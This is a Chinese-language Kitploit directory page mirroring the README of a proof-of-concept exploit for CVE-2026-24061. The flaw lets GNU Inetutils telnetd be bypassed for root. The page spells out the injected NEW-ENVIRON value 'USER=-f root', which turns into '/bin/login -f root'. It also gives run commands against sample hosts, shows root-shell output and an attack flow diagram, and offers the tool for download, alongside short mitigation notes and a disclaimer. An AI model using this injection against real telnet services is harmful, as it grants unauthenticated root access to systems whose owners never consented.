Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — 针对 GNU Inetutils telnetd 身份验证绕过漏洞(CVE-2026-24061)的概念验证漏洞利用,通过精心构造的 NEW-ENVIRON USER 变量生成 root shell。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证远程访问工具
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

针对 GNU Inetutils telnetd 身份验证绕过漏洞(CVE-2026-24061)的概念验证漏洞利用,通过精心构造的 NEW-ENVIRON USER 变量生成 root shell。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 概述

本仓库包含针对 GNU Inetutils telnetd 远程身份验证绕过漏洞的概念验证(PoC)利用代码。

该问题源于 telnetd 在调用 /bin/login 之前,未能正确清理通过 Telnet NEW‑ENVIRON 协商接收到的 USER 环境变量。

通过提供:

root@kitploit:~
USER=-f root

telnetd 实际上执行了:

root@kitploit:~
/bin/login -f root

从而绕过身份验证并立即生成 root shell。

  • 产品: GNU Inetutils telnetd
  • 受影响版本: ≤ 2.7
  • 端口: 23/TCP
  • 认证: 无需认证
  • 影响: 身份验证绕过 → Root Shell
  • 权限: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8(严重)

⚙️ 技术细节

Telnet NEW‑ENVIRON 允许客户端在会话协商期间设置环境变量。

存在漏洞的 telnetd 将 USER 直接传递给 login:

root@kitploit:~
/bin/login -f "$USER"

攻击者设置:

root@kitploit:~
USER=-f root

结果:

root@kitploit:~
/bin/login -f root

-f 标志告诉 login 跳过身份验证,从而授予 root 访问权限。


📦 环境要求

  • Python 3
  • telnetlib(标准库)
  • 目标运行存在漏洞的 inetutils‑telnetd ≤ 2.7
  • Telnet 服务可通过 TCP/23 访问

无需外部依赖。


🚀 使用方法

1️⃣ 运行利用代码

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ 可选端口

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ 预期结果

如果存在漏洞:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

您现在拥有一个交互式 root shell。


🧪 示例

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

输出:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 说明

  • 利用过程即时生效
  • 无需暴力破解
  • 无需凭据
  • 已观察到在野外被利用
  • 适用于默认 Debian/Ubuntu inetutils‑telnetd 安装
  • 如果 telnetd 已修补或替换(例如 OpenBSD telnetd),则利用失败

🛡️ 缓解措施

  • 升级 GNU Inetutils ≥ 2.8
  • 禁用 telnet 服务
  • 改用 SSH
  • 在防火墙处阻止 TCP/23
  • 审计 inetutils‑telnetd 软件包

📊 PoC 攻击流程

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session

⚠️ 免责声明

本利用代码仅供以下用途:

  • 安全研究
  • 授权的渗透测试
  • 防御性验证

未经授权对您不拥有或未经许可测试的系统使用本代码属于违法行为。

下载工具